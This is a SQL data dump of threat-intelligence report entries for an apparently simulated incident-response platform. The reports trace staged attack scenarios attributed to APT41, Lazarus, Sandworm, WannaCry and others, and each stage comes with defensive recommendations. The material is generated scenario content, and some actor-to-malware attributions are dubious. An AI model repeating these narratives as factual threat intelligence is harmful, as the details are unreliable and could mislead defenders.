(191, 37, 478, 3, 'Lateral Movement Analysis Across Internal Network', '### Overview\nInvestigation into the Aria-body backdoor has unveiled signs of lateral movement within the internal network. The attacker appears to be exploring the network to identify valuable targets.\n\n### Technical Details\n- **Movement Techniques**: The attacker utilizes legitimate credentials and tools to access other systems within the network.\n- **Targets Identified**: Several high-value systems have been accessed, indicating a targeted approach.\n\n### Implications\nThe lateral movement poses a significant risk as it suggests the attacker is positioning themselves for data exfiltration.\n\n### Countermeasures\n- Conduct a thorough audit of user accounts and permissions.\n- Isolate affected systems to prevent further unauthorized access.', '2026-01-05 03:08:29'),
(192, 37, 479, 4, 'Data Exfiltration to Command and Control Server', '### Overview\nSubsequent to the lateral movement activities, evidence of data exfiltration has been detected. Data is being transmitted to an external Command and Control (C2) server.\n\n### Technical Details\n- **Exfiltration Method**: The data is being exfiltrated over encrypted channels to evade detection.\n- **Type of Data**: Preliminary analysis suggests sensitive organizational data is being targeted.\n\n### Implications\nData exfiltration represents a critical breach of security and potential disclosure of sensitive information.\n\n### Immediate Actions\n- Block known C2 server IPs and domains.\n- Initiate an incident response protocol to contain and mitigate the breach.\n- Notify relevant stakeholders and begin a post-incident analysis to prevent future occurrences.', '2026-01-05 03:08:29'),
(193, 37, 480, 5, NULL, NULL, '2026-01-05 03:08:29'),
(194, 39, 481, 1, 'Unauthorized CMS Article Publication: Initial Access and Indicators', '### Overview\nUpon detecting a suspicious login, further analysis revealed unauthorized activity within the CMS. This activity is characterized by the creation and publication of articles containing misleading information.\n\n### Details\n- **Entry Point**: Exploitation of CMS vulnerabilities allowing remote access.\n- **Indicators of Compromise (IoCs)**: Abnormal login times, unfamiliar IP addresses, and modifications to content templates.\n\n### Recommendations\n- Immediate review and audit of CMS access logs.\n- Implementation of multi-factor authentication for CMS access.\n- Increase monitoring of content changes and publication activities.', '2026-01-05 03:22:52'),
(195, 39, 482, 2, 'Backdoor Account Creation: Ensuring Persistence', '### Overview\nFollowing the unauthorized publication of articles, further investigation uncovered the creation of backdoor accounts within the CMS to maintain persistent access.\n\n### Details\n- **Objective**: Establish long-term access to manipulate media content.\n- **Method**: Accounts created using compromised credentials or exploiting CMS administrative functions.\n\n### Indicators\n- New accounts with administrative privileges created without authorization.\n- Unusual account activity patterns.\n\n### Recommendations\n- Conduct a thorough review of all CMS accounts and privileges.\n- Enforce stricter user access controls and regular audits.', '2026-01-05 03:22:52'),
(196, 39, 483, 3, 'Social Media Amplification Detected: Expanding Influence', '### Overview\nWith the establishment of persistence via backdoor accounts, the operation has moved to social media platforms to amplify misinformation.\n\n### Details\n- **Tactics**: Use of bot networks and sockpuppet accounts to spread content.\n- **Platforms Targeted**: Prominent social media platforms where misinformation can quickly gain traction.\n\n### Indicators\n- Spike in social media activity related to the published misinformation.\n- Rapid increase in shares and likes from newly created or suspicious accounts.\n\n### Recommendations\n- Collaborate with social media platforms to identify and suspend malicious accounts.\n- Deploy AI-based tools to detect and mitigate bot-driven amplification.', '2026-01-05 03:22:52'),
(197, 39, 484, 4, 'Data Exfiltration Attempt Detected: Protecting Sensitive Information', '### Overview\nFollowing the amplification of misinformation, attempts have been made to exfiltrate sensitive data, potentially to leverage for further influence operations or blackmail.\n\n### Details\n- **Objective**: Extract sensitive data from compromised systems.\n- **Methods**: Use of encrypted channels and covert data transfer techniques.\n\n### Indicators\n- Unusual outbound data traffic patterns detected.\n- Use of unapproved encryption tools and protocols.\n\n### Recommendations\n- Immediate lockdown of affected systems to prevent further data loss.\n- Conduct a comprehensive forensic analysis to understand the scope of the breach.\n- Enhance data loss prevention mechanisms and user training on data security.', '2026-01-05 03:22:52'),
(198, 39, 485, 5, NULL, NULL, '2026-01-05 03:22:52'),
(199, 40, 486, 1, 'Compromised Supplier Network: Initial Access Analysis', '### Background\n\nFollowing the initial alert of a **Supply Chain Compromise**, intelligence indicates that APT41 has infiltrated a key supplier network within the gaming industry. This breach was achieved through the exploitation of a vulnerable third-party software component.\n\n### Implications\n\n- **Potential Threat**: The compromised supplier can act as a distribution point for malicious payloads like ShadowPad.\n- **Scope of Access**: Initial entry points can provide adversaries with broad access to the target\'s supply chain, making subsequent attacks more stealthy and impactful.\n\n### Recommendations\n\n- **Immediate Action**: Initiate a full review of all supplier network access points and enhance monitoring for abnormal activity.\n- **Preventive Measures**: Strengthen supplier security standards and conduct regular security audits.', '2026-01-05 03:26:48'),
(200, 40, 487, 2, 'Code Injection Detection in Build Environment', '### Overview\n\nFollowing the **Code Injection** alert, it has been detected that APT41 executed malicious code within the build environment of a key gaming application.\n\n### Details of the Attack\n\n- **Vector**: The adversary leveraged the compromised supplier credentials to inject malicious scripts into the build server.\n- **Target**: This code aims to facilitate the deployment of ShadowPad, enabling further infiltration.\n\n### Impact\n\n- **Integrity Risk**: Code integrity is compromised, potentially affecting all downstream applications.\n- **Propagation**: The injected code can propagate malicious payloads to end-user devices.\n\n### Mitigation Steps\n\n- **Immediate Scrutiny**: Conduct a thorough audit of the build environment for unauthorized changes.\n- **Verification**: Validate integrity of application updates before deployment.', '2026-01-05 03:26:48'),
(201, 40, 488, 3, 'ShadowPad Backdoor Installation and Persistence', '### Situation Update\n\nPost the execution phase, APT41 has successfully established persistence through the installation of the **ShadowPad backdoor**.\n\n### Mechanism of Persistence\n\n- **Backdoor Features**: ShadowPad is known for its modular architecture, allowing dynamic loading of plugins for various malicious functions.\n- **Stealth Techniques**: Utilizes encrypted communication and masquerades as legitimate software processes.\n\n### Strategic Implications\n\n- **Long-Term Access**: Persistent access enables ongoing espionage and potential sabotage.\n- **Network Vulnerability**: Ongoing risk of lateral movement within the network.\n\n### Defensive Measures\n\n- **Enhanced Monitoring**: Deploy behavioral analytics to detect abnormal patterns indicative of backdoor activity.\n- **System Hardening**: Apply security patches and restrict administrative privileges.', '2026-01-05 03:26:48'),
(202, 40, 489, 4, 'Credential Dumping and Lateral Movement', '### Current Threat Landscape\n\nAs the operation progresses, APT41 has initiated **Lateral Movement** across the player networks by exploiting dumped credentials.\n\n### Attack Dynamics\n\n- **Credential Access**: Utilizing stolen credentials, adversaries gain access to additional systems within the network.\n- **Movement Strategy**: Focused on reaching high-value targets and exfiltrating sensitive data.\n\n### Consequences\n\n- **Increased Exposure**: Compromised credentials lead to expanded access and control over network resources.\n- **Data Breach Risk**: Heightened risk of sensitive player data being accessed and exfiltrated.\n\n### Countermeasures\n\n- **Credential Hygiene**: Enforce password complexity and regular changes.\n- **Access Controls**: Implement multi-factor authentication and continuous monitoring of user activities.', '2026-01-05 03:26:48'),
(203, 40, 490, 5, NULL, NULL, '2026-01-05 03:26:48'),
(204, 41, 491, 1, 'Follow-up on Suspicious Email Attachment', '## Overview\nUpon detection of a suspicious email attachment, further analysis revealed that the email originated from a compromised server known to be associated with the Lazarus Group. This server previously engaged in spear-phishing campaigns targeting defense contractors.\n\n## Key Findings\n- **Sender Information**: The email appeared to be sent from a legitimate contact within the organization, suggesting email spoofing techniques were employed.\n- **Attachment Details**: The attachment was a macro-enabled Excel document designed to execute a malicious payload upon opening.\n\n## Recommendations\n- **Immediate Action**: Instruct recipients to delete the email without opening the attachment.\n- **Preventive Measures**: Enhance email gateway security to filter out similar threats.', '2026-01-05 04:01:18'),
(205, 41, 492, 2, 'DTrack Payload Execution Analysis', '## Overview\nThe execution of the DTrack malware payload marks a significant escalation in the attack, indicating a shift from reconnaissance to active exploitation.\n\n## Key Findings\n- **Payload Behavior**: DTrack is known for its ability to perform file operations, execute commands, and communicate with command and control (C2) servers.\n- **C2 Communication**: Encrypted traffic was detected heading to known Lazarus Group-controlled IP addresses.\n\n## Recommendations\n- **Immediate Action**: Quarantine affected systems to prevent further spread.\n- **Forensic Analysis**: Conduct a detailed forensic analysis of infected machines to understand the extent of compromise.', '2026-01-05 04:01:18'),
(206, 41, 493, 3, 'Persistence Mechanism - DLL Hijacking', '## Overview\nThe attackers are leveraging DLL hijacking to maintain persistence on compromised systems, a technique commonly used by the Lazarus Group to ensure their presence remains undetected.\n\n## Key Findings\n- **DLL Injection**: Malicious DLLs are injected into commonly used applications, allowing them to execute under the guise of legitimate processes.\n- **Registry Modifications**: Changes in registry keys have been detected, redirecting legitimate application paths to malicious DLLs.\n\n## Recommendations\n- **Immediate Action**: Review and restore altered registry keys to their original state.\n- **Monitoring**: Implement enhanced monitoring of DLL loads across critical systems.', '2026-01-05 04:01:18'),
(207, 41, 494, 4, 'Lateral Movement via Pass-the-Hash', '## Overview\nThe attack has progressed to lateral movement within the network using Pass-the-Hash techniques, indicating a high level of sophistication and access.\n\n## Key Findings\n- **Credential Abuse**: Compromised credentials were used to authenticate across multiple systems without the need for password cracking.\n- **Targeted Systems**: High-value targets such as servers containing sensitive defense schematics have been identified as primary targets.\n\n## Recommendations\n- **Immediate Action**: Invalidate all compromised credentials and enforce password resets.\n- **Network Segmentation**: Implement network segmentation to limit lateral movement capabilities.', '2026-01-05 04:01:18'),
(208, 41, 495, 5, NULL, NULL, '2026-01-05 04:01:18'),
(209, 42, 496, 1, 'Analysis of Initial Access via Suspicious Domain', '### Context\nFollowing the detection of suspicious domain access, further investigation reveals that the domains in question are linked to a known CopyKittens infrastructure. These domains have been associated with phishing campaigns targeting government entities.\n\n### Findings\n- **Domain Characteristics**: The domains exhibit patterns typical of CopyKittens, such as misspelled names of legitimate organizations.\n- **Vector Analysis**: Initial access is likely achieved through spear-phishing emails containing malicious links or attachments.\n\n### Recommendations\n- Implement enhanced email filtering rules to detect and block phishing attempts.\n- Conduct employee training on recognizing phishing emails.', '2026-01-05 04:03:11'),
(210, 42, 497, 2, 'Matryoshka RAT Execution and Behavioral Indicators', '### Context\nAfter the execution of the Matryoshka RAT, telemetry data indicates the deployment of the RAT on compromised systems.\n\n### Findings\n- **Execution Patterns**: The RAT is executed using script-based loaders, often leveraging PowerShell or JavaScript.\n- **Persistence Mechanisms**: Scheduled tasks and registry modifications have been identified as methods to ensure persistence.\n\n### Recommendations\n- Conduct system-wide scans for registry anomalies and unauthorized scheduled tasks.\n- Implement application whitelisting to prevent the execution of unauthorized scripts.', '2026-01-05 04:03:13'),
(211, 42, 498, 3, 'DNS Tunneling Activity and Persistence Tactics', '### Context\nThe identification of DNS tunneling activity signifies an attempt by the attackers to maintain a covert communication channel with the compromised systems.\n\n### Findings\n- **Tunneling Details**: Encoded DNS queries and responses are used to bypass traditional network monitoring.\n- **Infrastructure**: Analysis shows multiple subdomains dynamically resolving to various IP addresses, indicating a sophisticated command and control (C2) setup.\n\n### Recommendations\n- Deploy DNS monitoring solutions to identify and block tunneling activities.\n- Implement strict outbound DNS policies to prevent unauthorized queries.', '2026-01-05 04:03:13'),
(212, 42, 499, 4, 'Lateral Movement Indicators and Network Traffic Analysis', '### Context\nUnusual network traffic patterns suggest lateral movement within the network as attackers attempt to access sensitive systems.\n\n### Findings\n- **Traffic Anomalies**: High-volume data transfers and unusual port activity have been observed.\n- **Compromised Credentials**: Evidence suggests the use of harvested credentials to access additional systems.\n\n### Recommendations\n- Enhance network segmentation to limit lateral movement potential.\n- Conduct a thorough audit of user accounts and implement multi-factor authentication (MFA).', '2026-01-05 04:03:13'),
(213, 42, 500, 5, NULL, NULL, '2026-01-05 04:03:13'),
(214, 43, 501, 1, 'Profile Analysis of Unverified Facebook Account', '### Overview\nThe suspicious Facebook profile involved in the initial alert appears to have been created recently, lacking personal details and typical user activity. This is indicative of a potential fake persona used for social engineering.\n\n### Details\n- **Profile Name:** John Doe\n- **Creation Date:** 2 weeks ago\n- **Mutual Connections:** 0\n- **Activity:** Minimal posts, all generic\n\n### Analysis\nThis profile likely serves as a vector for social engineering, aimed at establishing trust with targets within aerospace firms. Recommend monitoring for further interactions and cross-referencing with other suspicious profiles.', '2026-01-06 01:24:23'),
(215, 43, 502, 2, 'Phishing Attempt via Direct Message', '### Overview\nA phishing attempt was identified following the interaction with the suspicious Facebook profile. An employee received a direct message containing a malicious link, masquerading as an industry-related article.\n\n### Details\n- **Sender:** Unverified Facebook Profile\n- **Message Content:** \'Check out this article on latest aerospace innovations\' with a shortened link.\n- **Intended Target:** Senior Engineer in R&D\n\n### Recommendations\n- **Immediate Action:** Block sender and delete message.\n- **Awareness Training:** Reinforce phishing awareness among staff, emphasizing caution with unsolicited messages.', '2026-01-06 01:24:23'),
(216, 43, 503, 3, 'Detection of \'Gholee\' Malware Execution', '### Overview\nThe execution of the \'Gholee\' malware was detected on a compromised system within the aerospace firm\'s network. The malware was likely deployed following the successful phishing attempt.\n\n### Details\n- **Affected System:** Workstation of Senior Engineer\n- **Malware Characteristics:** Known for data harvesting and creating backdoors\n- **Detection Method:** Anomaly detection via endpoint security solution\n\n### Recommendations\n- **Containment:** Isolate affected systems immediately.\n- **Forensic Analysis:** Conduct a detailed analysis to understand entry points and potential data affected.', '2026-01-06 01:24:23'),
(217, 43, 504, 4, 'Persistence Mechanisms Established by \'Gholee\'', '### Overview\nFurther analysis revealed that \'Gholee\' malware has established persistence mechanisms, ensuring its survival through system reboots and security updates.\n\n### Details\n- **Persistence Techniques:** \n  - Registry key modifications\n  - Scheduled tasks creation\n  - DLL injection into legitimate processes\n\n### Countermeasures\n- **Immediate Actions:** Remove persistence mechanisms by restoring registry keys and disabling scheduled tasks.\n- **Monitoring:** Enhance system logging to detect future persistence attempts.', '2026-01-06 01:24:23'),
(218, 43, 505, 5, 'Lateral Movement Across Network', '### Overview\nFollowing the establishment of persistence, lateral movement was detected across the network, likely aimed at accessing sensitive data and escalating privileges.\n\n### Details\n- **Techniques Used:**\n  - Pass-the-Hash\n  - Remote Desktop Protocol exploitation\n- **Affected Systems:** Multiple workstations and servers in the R&D department\n\n### Recommendations\n- **Network Segmentation:** Implement stricter segmentation to limit lateral movement.\n- **Credential Management:** Enforce strong, unique passwords and regular changes.\n- **Incident Response:** Conduct a full network sweep to identify and neutralize further threats.', '2026-01-06 01:24:23'),
(219, 43, 506, 6, NULL, NULL, '2026-01-06 01:24:23'),
(220, 44, 507, 1, 'Analysis of Malicious Code Execution', '## Context\nAfter the initial breach detected via EternalBlue, the adversary has executed malicious code on the compromised system. This report delves into the observed remote code execution (RCE) activities.\n\n## Findings\n- **Payload Analyzed**: The executed payload is identified as a variant of the WannaCry ransomware, designed to encrypt files on the infected machines.\n- **Execution Method**: The payload is executed using the exploitation of the SMBv1 vulnerability, allowing for unauthenticated remote code execution.\n- **Immediate Actions**: Mitigation strategies should include disabling SMBv1 and ensuring robust network segmentation to limit the damage of any further RCE attempts.', '2026-01-06 01:34:24'),
(221, 44, 508, 2, 'Persistence Mechanisms in Place', '## Overview\nFollowing the execution of malicious code, the ransomware has established persistence to survive system reboots and maintain control over the infected systems.\n\n## Details\n- **Techniques Used**: The ransomware modifies registry keys and schedules tasks to trigger on startup, ensuring its presence on the system.\n- **Potential Countermeasures**: Immediate actions include reviewing and cleaning registry keys and scheduled tasks, and implementing endpoint detection and response (EDR) solutions to monitor for persistence attempts.', '2026-01-06 01:34:24'),
(222, 44, 509, 3, 'SMB Propagation Analysis', '## Introduction\nThe ransomware is now actively propagating through the network using SMB protocol vulnerabilities. This report outlines the observed lateral movement patterns.\n\n## Observations\n- **Propagation Method**: Utilizes the EternalBlue exploit to spread to other vulnerable machines within the network.\n- **Network Mapping**: The ransomware scans the network for other vulnerable hosts, exponentially increasing its reach.\n- **Recommendations**: Immediate patching of all systems against SMBv1 vulnerabilities and isolation of affected subnets are critical to contain the spread.', '2026-01-06 01:34:24'),
(223, 44, 510, 4, 'Kill-Switch Domain Investigation', '## Summary\nA potential kill-switch domain has been identified, which could deactivate the ransomware if successfully queried.\n\n## Investigation\n- **Domain Analysis**: The domain has been hardcoded into the malware as a potential stop mechanism.\n- **Actionable Steps**: Conduct DNS sinkholing experiments to assess the feasibility of activating the kill-switch. Consider collaborating with global ISPs for widespread DNS monitoring.', '2026-01-06 01:34:24'),
(224, 44, 511, 5, 'Encryption Logic Breakdown', '## Overview\nThe ransomware has begun encrypting files on compromised systems. This report provides an analysis of its encryption logic.\n\n## Technical Details\n- **Encryption Algorithm**: Utilizes a combination of RSA and AES to encrypt files, ensuring robustness and difficulty in decryption without the private key.\n- **File Types Targeted**: Focuses on commonly used document and multimedia file formats.\n- **Countermeasures**: Regular backups and data recovery plans are essential. Evaluate the feasibility of deploying decryption tools if available.', '2026-01-06 01:34:24'),
(225, 44, 512, 6, 'Data Exfiltration Attempt Analysis', '## Context\nAs the ransomware encrypts data, it is also attempting to exfiltrate sensitive information from the compromised systems.\n\n## Key Insights\n- **Exfiltration Channels**: Observed usage of non-standard ports and encrypted protocols for data exfiltration attempts.\n- **Data Types at Risk**: Includes personally identifiable information (PII) and corporate intellectual property.\n- **Defense Strategies**: Immediate network traffic analysis and blocking suspicious outbound connections can mitigate data loss. Implement data loss prevention (DLP) solutions to monitor sensitive data movement.', '2026-01-06 01:34:24'),
(226, 44, 513, 7, 'Ransom Note Deployment and Impact', '## Summary\nThe deployment of ransom notes signifies the completion of the ransomware\'s encryption cycle and the demand for payment.\n\n## Insights\n- **Demand Details**: The ransom note typically demands payment in cryptocurrency, providing instructions for victims.\n- **Psychological Impact**: The presence of the ransom note induces urgency and panic, often leading to hasty decision-making.\n- **Recommendations**: Encourage organizations to have a clear incident response plan and avoid paying the ransom. Leverage law enforcement and cybersecurity partnerships for support.', '2026-01-06 01:34:24'),
(227, 44, 514, 8, NULL, NULL, '2026-01-06 01:34:24'),
(228, 45, 515, 1, 'In-Depth Analysis of Supply Chain Compromise', '### Overview\nThe initial alert indicates a compromised software update, typical of a supply chain attack. This technique is often employed to distribute malicious payloads widely and stealthily.\n\n### Key Findings\n- **Vendor Involvement**: The compromised update originated from a trusted vendor, indicating possible unauthorized access to their infrastructure.\n- **Distribution Scope**: Initial analysis suggests a widespread distribution affecting multiple sectors.\n\n### Recommendations\n- **Immediate Patch Review**: Verify the integrity of all recent updates and patches from associated vendors.\n- **Network Segmentation**: Implement network segmentation to contain any potential spread of malicious activity.\n\n### Next Steps\nWe anticipate potential destructive activities following the introduction of malicious components. Monitor for unusual disk activity, which may indicate MBR overwriting.', '2026-01-06 01:37:06'),
(229, 45, 516, 2, 'MBR Overwriting Detected: Sandworm\'s Signature', '### Overview\nFollowing the compromised software update, we have observed Master Boot Record (MBR) overwriting activity. This is a destructive action characteristic of Sandworm\'s tactics.\n\n### Key Indicators\n- **MBR Modification**: Unauthorized changes to the MBR have been logged, leading to potential system boot failures.\n- **System Recovery**: Attempts to recover the MBR have been partially successful, but full restoration is uncertain.\n\n### Recommendations\n- **Immediate System Backups**: Ensure that all critical data is backed up and secure.\n- **Forensic Analysis**: Engage forensic teams to analyze the altered MBR and identify further threats.\n\n### Next Steps\nGiven past Sandworm operations, expect potential credential harvesting as the next phase of the attack. Monitor for suspicious credential access activities.', '2026-01-06 01:37:06'),
(230, 45, 517, 3, 'Credential Harvesting via Mimikatz: A Deeper Threat', '### Overview\nCredential harvesting has been detected utilizing Mimikatz, a known tool for extracting account credentials from compromised systems.\n\n### Key Indicators\n- **Unauthorized Access Attempts**: Multiple failed and successful login attempts from unusual locations.\n- **Privileged Account Targeting**: Specific focus on accounts with elevated privileges.\n\n### Recommendations\n- **Account Lockdowns**: Immediately lockdown and reset passwords for compromised accounts.\n- **Multi-Factor Authentication**: Implement MFA to secure access to critical systems.\n\n### Next Steps\nPrepare for potential lateral movement within the network as the attacker leverages harvested credentials to propagate. Enhance monitoring for unusual internal network activity.', '2026-01-06 01:37:06'),
(231, 45, 518, 4, 'Lateral Movement and Data Exfiltration: Identifying the Attack Progression', '### Overview\nRapid lateral movement within the network has been identified, coupled with attempts to exfiltrate data.\n\n### Key Indicators\n- **Unusual Traffic Patterns**: High volumes of data transfers to external IPs not previously associated with the organization.\n- **Network Scanning**: Evidence of network scanning activities to identify further targets.\n\n### Recommendations\n- **Network Isolation**: Isolate affected segments to prevent further spread.\n- **Data Loss Prevention**: Strengthen DLP solutions to monitor and block unauthorized data transfers.\n\n### Conclusion\nThe operation has reached a critical stage with the potential for significant data loss. Immediate containment and remediation efforts are essential to minimize impact.', '2026-01-06 01:37:06'),
(232, 45, 519, 5, NULL, NULL, '2026-01-06 01:37:06'),
(233, 46, 520, 1, 'Investigation into Suspicious Network Traffic', '### Summary\nFollowing the detection of suspicious network traffic linked to a potential drive-by download, our team has initiated a comprehensive analysis to identify the source and nature of the traffic.\n\n### Findings\n- **Traffic Source**: The suspicious traffic originated from IP addresses associated with compromised websites known to distribute fake Adobe Flash updates.\n- **Payload Analysis**: Initial investigations suggest the payload is part of a phishing campaign aimed at delivering ransomware.\n\n### Next Steps\nContinue monitoring for further network anomalies and prepare for potential execution of malicious software as indicated by the observed traffic patterns.', '2026-01-06 01:39:37'),
(234, 46, 521, 2, 'Analysis of Unverified Flash Update Execution', '### Summary\nAn unverified Adobe Flash update has been executed on several endpoints. This execution is suspected to be part of the Callisto Group\'s ransomware campaign.\n\n### Findings\n- **Execution Method**: The update bypassed standard security checks, indicating sophisticated evasion techniques.\n- **Code Review**: Preliminary code analysis shows similarities with known ransomware families, suggesting the dropper is used to deploy DiskCryptor.\n\n### Next Steps\nConduct a detailed reverse engineering of the executed file to confirm its capabilities and potential payloads. Prepare defenses against ransomware activation.', '2026-01-06 01:39:37'),
(235, 46, 522, 3, 'DiskCryptor Ransomware Persistence Strategy', '### Summary\nDiskCryptor ransomware has been detected, indicating the persistence phase of the attack.\n\n### Findings\n- **Ransomware Behavior**: The ransomware has encrypted local drives and is configured to activate upon system reboot.\n- **Persistence Mechanism**: Utilizes bootloader modification to ensure ransomware executes at system startup.\n\n### Next Steps\nIsolate infected systems to prevent further spread. Begin decryption efforts and analyze the persistence mechanisms to develop countermeasures.', '2026-01-06 01:39:37'),
(236, 46, 523, 4, 'Investigation into Unauthorized SMB Traffic', '### Summary\nUnauthorized SMB traffic has been observed, suggesting lateral movement within the network.\n\n### Findings\n- **Propagation Method**: Ransomware is leveraging SMB protocol to spread across network shares.\n- **Targeted Systems**: Systems with outdated SMB configurations are particularly vulnerable.\n\n### Next Steps\nImplement network segmentation to contain the spread. Initiate internal audits to identify and patch vulnerable systems. Prepare for potential data exfiltration attempts.', '2026-01-06 01:39:37'),
(237, 46, 524, 5, NULL, NULL, '2026-01-06 01:39:37'),
(238, 47, 525, 1, 'Unauthorized Network Access: Initial Analysis', '### Overview\nThe initial breach was detected at 03:45 UTC, involving unauthorized access to the network managing the Olympic ceremony systems. Our analysis indicates the use of stolen credentials to bypass security protocols.\n\n### Details\n- **Entry Point**: Compromised VPN credentials likely obtained through phishing.\n- **Affected Systems**: Early identification shows infiltration in user authentication servers.\n\n### Next Steps\nInvestigation will focus on identifying the origin of the breach and monitoring for any further unauthorized activities. Anticipate potential execution of malicious scripts as attackers establish foothold.', '2026-01-06 01:44:46');
INSERT INTO `operation_alerts` (`id`, `operation_id`, `alert_id`, `sequence_order`, `intel_report_title`, `intel_report_content`, `created_at`) VALUES
(239, 47, 526, 2, 'Malicious Script Execution: Compromise Analysis', '### Overview\nFollowing the initial breach, malicious scripts were executed on ceremony systems, indicating an escalation in the attack. These scripts aim to disrupt key functionalities during the event.\n\n### Details\n- **Execution Method**: Scripts were deployed via PowerShell to modify system configurations.\n- **Impact**: Disruption in media streaming services and live event broadcasting.\n\n### Insights\nThe attackers are utilizing tools consistent with known Sandworm TTPs, suggesting a sophisticated operation. Next, we will analyze for signs of persistence mechanisms being established.', '2026-01-06 01:44:46'),
(240, 47, 527, 3, 'Persistence Mechanisms: Backdoor Installation', '### Overview\nThe attackers have installed multiple backdoors to ensure continued access and control over the compromised systems.\n\n### Details\n- **Backdoor Types**: Custom RATs detected, allowing remote command execution.\n- **Installation Method**: Leveraged administrative privileges obtained from initial breach.\n\n### Next Steps\nWith persistence achieved, the threat actors are expected to attempt lateral movement to spread through critical infrastructure. Monitoring lateral traffic and securing adjacent systems is crucial.', '2026-01-06 01:44:46'),
(241, 47, 528, 4, 'Lateral Movement: Internal Threat Expansion', '### Overview\nThe attackers are actively moving laterally within the network, targeting critical systems essential for ceremony operations.\n\n### Details\n- **Techniques Used**: SMB protocol exploitation and credential dumping observed.\n- **Targets**: Focus on database servers and event coordination systems.\n\n### Insights\nTheir movement patterns suggest a high level of network knowledge, potentially indicating insider collaboration. The next phase may involve data exfiltration, aiming at sensitive information related to event operations and personnel.', '2026-01-06 01:44:46'),
(242, 47, 529, 5, NULL, NULL, '2026-01-06 01:44:46'),
(243, 48, 530, 1, NULL, NULL, '2026-01-06 02:36:36'),
(244, 48, 531, 2, 'Malicious Payload Deployment Analysis', '## Malicious Payload Deployment Analysis\n\n**Overview:**\nFollowing the initial access via the ASUS Update Utility compromise, threat actors have successfully deployed a malicious payload across affected systems. This payload is designed to execute upon installation of the compromised update.\n\n**Key Findings:**\n- The payload targets systems immediately after the ASUS Live Update installation.\n- Analysis indicates the payload includes a dropper that installs additional malware components.\n- The dropper executes with administrative privileges, allowing it to bypass user account controls.\n\n**Recommendations:**\n- Conduct a thorough scan of all systems for known indicators of compromise.\n- Employ behavioral analysis to detect unusual process execution linked to the update utility.\n\n**Next Steps:**\nFocus on understanding the persistence mechanisms established post-payload execution to maintain threat actor presence.', '2026-01-06 02:36:36'),
(245, 48, 532, 3, 'Backdoor Access and Persistence', '## Backdoor Access and Persistence\n\n**Overview:**\nPost-execution, the threat actors have established backdoor access, ensuring persistent presence on compromised systems. This allows them to maintain control and facilitate further exploitation.\n\n**Key Findings:**\n- A new service is created to run at startup, linked to the malicious payload.\n- Registry modifications detected to ensure backdoor persistence.\n- Backdoor communications are encrypted, complicating detection efforts.\n\n**Recommendations:**\n- Monitor for creation of unauthorized services and registry changes.\n- Implement endpoint detection and response (EDR) solutions to track anomalous behaviors.\n\n**Next Steps:**\nInvestigate potential lateral movement patterns and credentials that may have been compromised.', '2026-01-06 02:36:36'),
(246, 48, 533, 4, 'Lateral Movement and Credential Dumping', '## Lateral Movement and Credential Dumping\n\n**Overview:**\nWith established persistence, the threat actors are moving laterally within the network, harvesting credentials to gain access to additional systems.\n\n**Key Findings:**\n- Use of legitimate tools like Mimikatz to dump credentials from memory.\n- Compromised accounts exhibit unusual login patterns and access attempts.\n- Network traffic analysis reveals attempts to authenticate across multiple systems.\n\n**Recommendations:**\n- Reset credentials for impacted accounts and enforce multi-factor authentication.\n- Deploy network segmentation to limit the spread of lateral movement.\n\n**Next Steps:**\nFocus on identifying and mitigating data exfiltration attempts as attackers access sensitive information.', '2026-01-06 02:36:36'),
(247, 48, 534, 5, 'Data Harvesting and Exfiltration', '## Data Harvesting and Exfiltration\n\n**Overview:**\nThreat actors are actively harvesting sensitive data from compromised systems, preparing for exfiltration to external servers.\n\n**Key Findings:**\n- Large volumes of data being compressed and staged for transfer.\n- Use of encrypted channels to conceal data movement from detection.\n- Targeted data includes intellectual property and user credentials.\n\n**Recommendations:**\n- Monitor outbound traffic for anomalies and block unauthorized data transfers.\n- Implement data loss prevention (DLP) solutions to identify and protect sensitive data.\n\n**Next Steps:**\nDetermine the specific targets based on MAC addresses to understand threat actor intentions.', '2026-01-06 02:36:36'),
(248, 48, 535, 6, 'Targeted MAC Address Identification', '## Targeted MAC Address Identification\n\n**Overview:**\nInvestigation reveals that threat actors are targeting systems with specific MAC addresses, indicating a highly selective attack strategy.\n\n**Key Findings:**\n- Analysis of compromised systems shows a pattern of MAC address targeting.\n- Threat actors appear to prioritize high-value targets within the network.\n- This targeted approach minimizes detection and maximizes impact on selected assets.\n\n**Recommendations:**\n- Identify and isolate systems with targeted MAC addresses to prevent further compromise.\n- Conduct a detailed audit of affected systems to understand the scope of the breach.\n\n**Next Steps:**\nExamine ongoing command and control communications to gain insight into threat actor objectives.', '2026-01-06 02:36:36'),
(249, 48, 536, 7, 'Command and Control Communication Analysis', '## Command and Control Communication Analysis\n\n**Overview:**\nThreat actors maintain command and control communications to coordinate their activities across compromised systems.\n\n**Key Findings:**\n- Use of custom C2 protocols to evade detection by standard network defenses.\n- Communication patterns indicate periodic updates and tasking from external servers.\n- C2 infrastructure is resilient, leveraging multiple domains and IPs for redundancy.\n\n**Recommendations:**\n- Block known C2 domains and IP addresses identified during the investigation.\n- Employ network intrusion detection systems (NIDS) to monitor for C2 communication patterns.\n\n**Next Steps:**\nInvestigate any anti-forensic techniques employed by threat actors to cover their tracks and hinder analysis.', '2026-01-06 02:36:36'),
(250, 48, 537, 8, 'Cleanup and Anti-Forensic Techniques', '## Cleanup and Anti-Forensic Techniques\n\n**Overview:**\nAfter completing their objectives, threat actors are employing anti-forensic techniques to erase evidence and hinder investigation efforts.\n\n**Key Findings:**\n- Use of secure delete utilities to remove traces of malware and logs.\n- Manipulation of timestamps and metadata to obscure activity timelines.\n- Disabling of logging and monitoring tools on compromised systems.\n\n**Recommendations:**\n- Recover deleted files using advanced forensic tools to piece together the attack timeline.\n- Strengthen logging and monitoring capabilities to detect future anti-forensic activities.\n\n**Conclusion:**\nConduct a post-incident review to enhance defenses and reduce the likelihood of similar attacks in the future.', '2026-01-06 02:36:36'),
(251, 49, 538, 1, 'Analysis of Suspicious Cloud Service Access Patterns', '### Overview\nFollowing the detection of suspicious cloud service access, further analysis has identified anomalous login patterns from IP addresses linked to known Inception APT activities.\n\n### Findings\n- **Unusual Login Times:** Access attempts were recorded during non-business hours, consistent with tactics used by Inception APT to remain undetected.\n- **Geolocation:** The IP addresses originate from regions with a known Inception APT presence, notably within Eastern European countries.\n- **Access Attempts:** Credentials appear to have been compromised, as multiple failed login attempts were observed before successful access.\n\n### Recommendations\n- **Immediate Response:** Enforce multi-factor authentication for all cloud service accounts.\n- **Monitoring:** Increase monitoring of access logs for unusual patterns, particularly IP addresses from suspicious regions.\n- **User Awareness Training:** Conduct a security awareness program focusing on phishing and credential security.', '2026-01-07 22:29:04'),
